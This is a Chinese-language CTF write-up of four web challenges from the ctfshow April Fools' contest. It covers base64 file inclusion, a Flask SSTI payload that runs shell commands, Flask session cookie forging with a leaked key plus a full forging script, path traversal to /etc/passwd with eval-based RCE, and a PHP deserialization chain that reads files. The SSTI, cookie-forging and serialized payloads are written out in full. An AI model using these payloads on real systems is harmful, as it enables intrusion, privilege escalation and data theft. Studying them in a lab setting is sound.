鄙人不才，可惜这里只做出了4道相对简单的web题（悲）

热身赛：

哈哈哈，不愧是愚人杯，刚开始时脑子真没反应过来
flag就是“一个不能说的密码”，绝了，我还以为flag是“群主喜欢36d”（bushi）

easy_signin

题目：

可以看到url里有一个img=xxx

xxx为十六编码

我们试一下用index.php转换为base64：aW5kZXgucGhw

包含aW5kZXgucGhw

得到：

PD9waHAKLyoKIyAtKi0gY29kaW5nOiB1dGYtOCAtKi0KIyBAQXV0aG9yOiBoMXhhCiMgQERhdGU6ICAgMjAyMy0wMy0yNyAxMDozMDozMAojIEBMYXN0IE1vZGlmaWVkIGJ5OiAgIGgxeGEKIyBATGFzdCBNb2RpZmllZCB0aW1lOiAyMDIzLTAzLTI4IDEyOjE1OjMzCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQojIEBsaW5rOiBodHRwczovL2N0ZmVyLmNvbQoKKi8KCiRpbWFnZT0kX0dFVFsnaW1nJ107CgokZmxhZyA9ICJjdGZzaG93ezBmZTk1YjRhLTU2NjEtNDU0OS04NzMxLTA1OTk0NzYyYmJhYX0iOwppZihpc3NldCgkaW1hZ2UpKXsKCSRpbWFnZSA9IGJhc2U2NF9kZWNvZGUoJGltYWdlKTsKCSRkYXRhID0gYmFzZTY0X2VuY29kZShmaWxlX2dldF9jb250ZW50cygkaW1hZ2UpKTsKCWVjaG8gIjxpbWcgc3JjPSdkYXRhOmltYWdlL3BuZztiYXNlNjQsJGRhdGEnLz4iOwp9ZWxzZXsKCSRpbWFnZSA9IGJhc2U2NF9lbmNvZGUoImZhY2UucG5nIik7CgloZWFkZXIoImxvY2F0aW9uOi8/aW1nPSIuJGltYWdlKTsKfQoKCgoK

进行base64解码得到：

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-03-27 10:30:30
# @Last Modified by:   h1xa
# @Last Modified time: 2023-03-28 12:15:33
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
- /
$image=$_GET['img'];
$flag = "ctfshow{0fe95b4a-5661-4549-8731-05994762bbaa}";
if(isset($image)){
	$image = base64_decode($image);
	$data = base64_encode(file_get_contents($image));
	echo "<img src='data:image/png;base64,$data'/>";
}else{
	$image = base64_encode("face.png");
	header("location:/?img=".$image);
}

得到flag

easy_ssti

题目：页面提示有个app.py包，我们下载来看一下

from flask import Flask
from flask import render_template_string,render_template
app = Flask(__name__)
@app.route('/hello/')
def hello(name=None):
    return render_template('hello.html',name=name)
@app.route('/hello/<name>')
def hellodear(name):
    if "ge" in name:
        return render_template_string('hello %s' % name)
    elif "f" not in name:
        return render_template_string('hello %s' % name)
    else:
        return 'Nonononon'

是道SSTI注入，我们需要访问/hello.html，拼接：/hello.html/{{payload}}进行注入

先试一下{{1+1}}，没问题，页面返回2，证明代码成功运行了

思路：

利用"".__class__.__bases__[0].__subclasses__()[83]构造出我们想要的类

"".__class__：当前变量的类

“”.__class__.___bases__[0]：当前变量的类的基类（最基础的类，[0]表示object类）

"".__class__.__bases__[0].__subclasses__()[83] 当前变量的类的基类的子类（到这里已经包含了其他类，83表示数组中的索引，指向一个类，83是通过爆破出来的，一边爆破一边看包返回长度及内容）

然后__init__表示将类初始化（有点像实例化，不确定）

__globals__ 取function所处空间下可使用的module、方法以及所有变量

__globals__['__builtins__'] 表示类里面的函数了（这里可以输出看一下有什么函数，如果没有我们要的可以更改__subclasses__[]看一下有没有我们想要的）

__globals__['__builtins__']['eval']() 调用eval函数

传参("__import__('os').popen('echo Y2F0IC9mbGFn |base64 -d|sh').read()")

这里已经是执行python代码了，我们动态导入os库，然后调用popen执行，用read()读取

这里出现了个问题，就是传入参数中屏蔽了斜杆“/”，所以我们需要使用base64编码绕过

但又出来个问题，我以前用的是bash，但这里发现不行，所以根据经验改为sh

最后得到payload:

http://af57955d-b019-4224-9356-8e996bc58900.challenge.ctf.show/hello/{{"".__class__.__bases__[0].__subclasses__()[83].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('echo Y2F0IC9mbGFn |base64 -d|sh').read()")}}

成功！！！

easy_flask

知识点：

• flask session伪造
• flask代码审计
• 任意文件下载

题目：

进来之后有两个窗口，一个登录窗口和一个注册窗口

在注册窗口尝试注册了admin，发现用户已存在

然后在这里在登录和注册试了sql注入，没成功

我们先随便注册一个账号，登录进去

发现有个leran 点击（我刚开始没点击，在登录和注册徘徊了1个多小时（悲））

• 得到部分源代码

  # app.py
  from flask import Flask, render_template, request, redirect, url_for, session, send_file, Response
  app = Flask(__name__)
  app.secret_key = 'S3cr3tK3y'
  users = {
  }
  @app.route('/')
  def index():
  # Check if user is loggedin
  if 'loggedin' in session:
  return redirect(url_for('profile'))
  return redirect(url_for('login'))
  @app.route('/login/', methods=['GET', 'POST'])
  def login():
  msg = ''
  if request.method == 'POST' and 'username' in request.form and 'password' in request.form:
  username = request.form['username']
  password = request.form['password']
  if username in users and password == users[username]['password']:
  session['loggedin'] = True
  session['username'] = username
  session['role'] = users[username]['role']
  return redirect(url_for('profile'))
  else:
  msg = 'Incorrect username/password!'
  return render_template('login.html', msg=msg)
  @app.route('/register/', methods=['GET', 'POST'])
  def register():
  msg = ''
  if request.method == 'POST' and 'username' in request.form and 'password' in request.form:
  username = request.form['username']
  password = request.form['password']
  if username in users:
  msg = 'Account already exists!'
  else:
  users[username] = {'password': password, 'role': 'user'}
  msg = 'You have successfully registered!'
  return render_template('register.html', msg=msg)
  @app.route('/profile/')
  def profile():
  if 'loggedin' in session:
  return render_template('profile2.html', username=session['username'], role=session['role'])
  return redirect(url_for('login'))
  ........
  

对代码进行审计，看来我们需要进行flask session伪造

• 来自网上大佬的flask session伪造脚本：

  #!/usr/bin/env python3
  """ Flask Session Cookie Decoder/Encoder """
  __author__ = 'Wilson Sumanang, Alexandre ZANNI'
  # standard imports
  import sys
  import zlib
  from itsdangerous import base64_decode
  import ast
  # Abstract Base Classes (PEP 3119)
  if sys.version_info[0] < 3:  # < 3.0
      raise Exception('Must be using at least Python 3')
  elif sys.version_info[0] == 3 and sys.version_info[1] < 4:  # >= 3.0 && < 3.4
      from abc import ABCMeta, abstractmethod
  else:  # > 3.4
      from abc import ABC, abstractmethod
  # Lib for argument parsing
  import argparse
  # external Imports
  from flask.sessions import SecureCookieSessionInterface
  class MockApp(object):
      def __init__(self, secret_key):
          self.secret_key = secret_key
  if sys.version_info[0] == 3 and sys.version_info[1] < 4:  # >= 3.0 && < 3.4
      class FSCM(metaclass=ABCMeta):
          def encode(secret_key, session_cookie_structure):
  """ Encode a Flask session cookie """
  try:
                  app = MockApp(secret_key)
                  session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                  si = SecureCookieSessionInterface()
                  s = si.get_signing_serializer(app)
                  return s.dumps(session_cookie_structure)
              except Exception as e:
                  return "[Encoding error] {}".format(e)
                  raise e
          def decode(session_cookie_value, secret_key=None):
  """ Decode a Flask cookie  """
  try:
                  if (secret_key == None):
                      compressed = False
                      payload = session_cookie_value
                      if payload.startswith('.'):
                          compressed = True
                          payload = payload[1:]
                      data = payload.split(".")[0]
                      data = base64_decode(data)
                      if compressed:
                          data = zlib.decompress(data)
                      return data
                  else:
                      app = MockApp(secret_key)
                      si = SecureCookieSessionInterface()
                      s = si.get_signing_serializer(app)
                      return s.loads(session_cookie_value)
              except Exception as e:
                  return "[Decoding error] {}".format(e)
                  raise e
  else:  # > 3.4
      class FSCM(ABC):
          def encode(secret_key, session_cookie_structure):
  """ Encode a Flask session cookie """
  try:
                  app = MockApp(secret_key)
                  session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                  si = SecureCookieSessionInterface()
                  s = si.get_signing_serializer(app)
                  return s.dumps(session_cookie_structure)
              except Exception as e:
                  return "[Encoding error] {}".format(e)
                  raise e
          def decode(session_cookie_value, secret_key=None):
  """ Decode a Flask cookie  """
  try:
                  if (secret_key == None):
                      compressed = False
                      payload = session_cookie_value
                      if payload.startswith('.'):
                          compressed = True
                          payload = payload[1:]
                      data = payload.split(".")[0]
                      data = base64_decode(data)
                      if compressed:
                          data = zlib.decompress(data)
                      return data
                  else:
                      app = MockApp(secret_key)
                      si = SecureCookieSessionInterface()
                      s = si.get_signing_serializer(app)
                      return s.loads(session_cookie_value)
              except Exception as e:
                  return "[Decoding error] {}".format(e)
                  raise e
  if __name__ == "__main__":
      # Args are only relevant for __main__ usage
      ## Description for help
      parser = argparse.ArgumentParser(
          description='Flask Session Cookie Decoder/Encoder',
          epilog="Author : Wilson Sumanang, Alexandre ZANNI")
      ## prepare sub commands
      subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')
      ## create the parser for the encode command
      parser_encode = subparsers.add_parser('encode', help='encode')
      parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                 help='Secret key', required=True)
      parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                 help='Session cookie structure', required=True)
      ## create the parser for the decode command
      parser_decode = subparsers.add_parser('decode', help='decode')
      parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                 help='Secret key', required=False)
      parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                 help='Session cookie value', required=True)
      ## get args
      args = parser.parse_args()
      ## find the option chosen
      if (args.subcommand == 'encode'):
          if (args.secret_key is not None and args.cookie_structure is not None):
              print(FSCM.encode(args.secret_key, args.cookie_structure))
      elif (args.subcommand == 'decode'):
          if (args.secret_key is not None and args.cookie_value is not None):
              print(FSCM.decode(args.cookie_value, args.secret_key))
          elif (args.cookie_value is not None):
              print(FSCM.decode(args.cookie_value))
  # {'loggedin': True, 'role': 'admin', 'username': 'admin'}
  

我们在浏览器把session复制下来

利用脚本进行session解密和伪造：

（解密后推理管理员伪造的规律）

D:\CTFtools\其他\pytools>[demo1.py](http://demo1.py/) decode -s "S3cr3tK3y" -c "eyJsb2dnZWRpbiI6dHJ1ZSwicm9sZSI6InVzZXIiLCJ1c2VybmFtZSI6ImFkbWluMiJ9.ZCeNjw.SI08C_xd1I55TbZzcedhgi_oqcU"
{'loggedin': True, 'role': 'user', 'username': 'admin2'}

D:\CTFtools\其他\pytools>[demo1.py](http://demo1.py/) encode -s "S3cr3tK3y" -t "{'loggedin': True, 'role': 'admin', 'username': 'admin'}"
.eJyrVsrJT09PTcnMU7IqKSpN1VEqys9JVbJSSkzJBYrpKJUWpxblJeYihGoBzOYRgA.ZCeVRA.p_DkccHDcwzHQA7CmXPqH-5OF3c

将伪造后的session导入

成功登入

发现一个txt文件，下载到一个假的flag

重新回到主页，看到那个东西下载有点像任意文件下载

我们下一个…/…/…/…/…/…/…/etc/passwd试试

成功下载，我们下载网站源代码（因为上面给的源代码只是一部分）：app.py

成功下载

• app.py源码：

  # app.py
  from flask import Flask, render_template, request, redirect, url_for, session, send_file, Response
  app = Flask(__name__)
  app.secret_key = 'S3cr3tK3y'
  users = {
      'admin': {'password': 'LKHSADSFHLA;KHLK;FSDHLK;ASFD', 'role': 'admin'}
  }
  @app.route('/')
  def index():
      # Check if user is loggedin
      if 'loggedin' in session:
          return redirect(url_for('profile'))
      return redirect(url_for('login'))
  @app.route('/login/', methods=['GET', 'POST'])
  def login():
      msg = ''
      if request.method == 'POST' and 'username' in request.form and 'password' in request.form:
          username = request.form['username']
          password = request.form['password']
          if username in users and password == users[username]['password']:
              session['loggedin'] = True
              session['username'] = username
              session['role'] = users[username]['role']
              return redirect(url_for('profile'))
          else:
              msg = 'Incorrect username/password!'
      return render_template('login2.html', msg=msg)
  @app.route('/register/', methods=['GET', 'POST'])
  def register():
      msg = ''
      if request.method == 'POST' and 'username' in request.form and 'password' in request.form:
          username = request.form['username']
          password = request.form['password']
          if username in users:
              msg = 'Account already exists!'
          else:
              users[username] = {'password': password, 'role': 'user'}
              msg = 'You have successfully registered!'
      return render_template('register2.html', msg=msg)
  @app.route('/profile/')
  def profile():
      if 'loggedin' in session:
          return render_template('profile2.html', username=session['username'], role=session['role'])
      return redirect(url_for('login'))
  @app.route('/show/')
  def show():
      if 'loggedin' in session:
          return render_template('show2.html')
  @app.route('/download/')
  def download():
      if 'loggedin' in session:
          filename = request.args.get('filename')
          if 'filename' in request.args:
              return send_file(filename, as_attachment=True)
      return redirect(url_for('login'))
  @app.route('/hello/')
  def hello_world():
      try:
          s = request.args.get('eval')
          return f"hello,{eval(s)}"
      except Exception as e:
          print(e)
          pass
      return "hello"
  @app.route('/logout/')
  def logout():
      session.pop('loggedin', None)
      session.pop('id', None)
      session.pop('username', None)
      session.pop('role', None)
      return redirect(url_for('login'))
  if __name__ == "__main__":
      app.run(host='0.0.0.0', port=8080)
  

我们注意到一段（比较狗血的就是我之前在登录界面徘徊那段时间，用目录扫描扫出了这个玩意）

def hello_world():
    try:
        s = request.args.get('eval')
        return f"hello,{eval(s)}"
    except Exception as e:
        print(e)
        pass
    return "hello"

这里我们直接可以rce了

payload：

/hello/?eval=**import**('os').popen('ls').read()

/hello/?eval=**import**('os').popen('ls /').read()

/hello/?eval=**import**('os').popen('cat /flag_is_h3re').read()

得到flag

被遗忘的反序列化（估计是非预期解）

• 题目：

  <?php
  # 当前目录中有一个txt文件哦
  error_reporting(0);
  show_source(__FILE__);
  include("check.php");
  class EeE{
      public $text;
      public $eeee;
      public function __wakeup(){
          if ($this->text == "aaaa"){
              echo lcfirst($this->text);
          }
      }
      public function __get($kk){
          echo "$kk,eeeeeeeeeeeee";
      }
      public function __clone(){
          $a = new cycycycy;
          $a -> aaa();
      }
  }
  class cycycycy{
      public $a;
      private $b;
      public function aaa(){
          $get = $_GET['get'];
          $get = cipher($get);
          if($get === "p8vfuv8g8v8py"){
              eval($_POST["eval"]);
          }
      }
      public function __invoke(){
          $a_a = $this -> a;
          echo "\$a_a\$";
      }
  }
  class gBoBg{
      public $name;
      public $file;
      public $coos;
      private $eeee="-_-";
      public function __toString(){
          if(isset($this->name)){
              $a = new $this->coos($this->file);
              echo $a;
          }else if(!isset($this -> file)){
              return $this->coos->name;
          }else{
              $aa = $this->coos;
              $bb = $this->file;
              return $aa();
          }
      }
  }
  class w_wuw_w{
      public $aaa;
      public $key;
      public $file;
      public function __wakeup(){
          if(!preg_match("/php|63|\*|\?/i",$this -> key)){
              $this->key = file_get_contents($this -> file);
          }else{
              echo "不行哦";
          }
      }
      public function __destruct(){
          echo $this->aaa;
      }
      public function __invoke(){
          $this -> aaa = clone new EeE;
      }
  }
  $_ip = $_SERVER["HTTP_AAAAAA"];
  unserialize($_ip);
  

把代码拉到vscode比较容易看一些

先看一下题目的代码，反序列化的注入点在$_ip = $_SERVER["HTTP_AAAAAA"];

所以我们需要在http请求头注入一个参数：AAAAAA:xxx（xxx为反序列化的内容）

既然是非预期解，这里直接挑重点看了（毕竟只用到2个类）（此处省略了其他没用到的东西，方便理解）：

class gBoBg{
    public $name;
    public $file;
    public $coos;
    private $eeee="-_-";
    public function __toString(){ #__toString魔术函数，但一个对象被当作字符串使用时被调用
        if(isset($this->name)){  #name有定义，但定义什么没有关系，因为后面没用到
            $a = new $this->coos($this->file); #coos作为函数的名，file作函数的参数
            echo $a; # 输出
        }
    }
}   
class w_wuw_w{
    public $aaa;
    public function __destruct(){
        echo $this->aaa; 
    }
}

我们知道在php中支持使用$a($b)这样动态的形式调用函数/实例化，

可以看到我们这一行就是这样的形式：$a = new $this->coos($this->file);

所以我们的思路是通过给coos和file赋值，实现rce或者文件操作

• 有人就问了：coos我用了file_get_contents，file我传入了地址，为什么读取不到文件。

答：因为这行代码是对象实例化，而file_get_contents是一个函数，不是一个类，所以我们这里coos要传入一个内置类了

这里我们就需要看一下有什么内置类了

可遍历目录类有以下几个：

• DirectoryIterator 类
• FilesystemIterator 类
• GlobIterator 类

可读取文件类有：

• SplFileObject 类

我们需要用内置类来遍历目录，然后读取文件

POC:

<?php
class gBoBg{
    public $name;
    public $file;
    public $coos;
    // private $eeee="-_-";
}   
class w_wuw_w{
    public $aaa;
    public $key;
    public $file;
}
 $w=new w_wuw_w();
 $w->aaa=new gBoBg();
 $w->aaa->name="1";
 $w->aaa->file="/f1agaaa";
 $w->aaa->coos="SplFileObject";
echo serialize($w);

分两步走，第一步读取文件目录

$w->aaa->file="glob:///*f*"; #使用glob协来查找匹配的文件路径模式 这里/*f*匹配了根目录下包含f的文件夹名
$w->aaa->coos="DirectoryIterator";
得到：O:7:"w_wuw_w":3:{s:3:"aaa";O:5:"gBoBg":3:{s:4:"name";s:1:"1";s:4:"file";s:11:"glob:///*f*";s:4:"coos";s:17:"DirectoryIterator";}s:3:"key";N;s:4:"file";N;}

第二步，使用SplFileObject类读取文件内容：

$w->aaa->file="/f1agaaa";
$w->aaa->coos="SplFileObject";
得到：O:7:"w_wuw_w":3:{s:3:"aaa";O:5:"gBoBg":3:{s:4:"name";s:1:"1";s:4:"file";s:8:"/f1agaaa";s:4:"coos";s:13:"SplFileObject";}s:3:"key";N;s:4:"file";N;}